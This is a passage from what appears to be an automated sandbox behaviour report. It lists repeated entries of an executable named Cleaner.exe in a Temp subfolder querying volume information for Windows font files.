Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
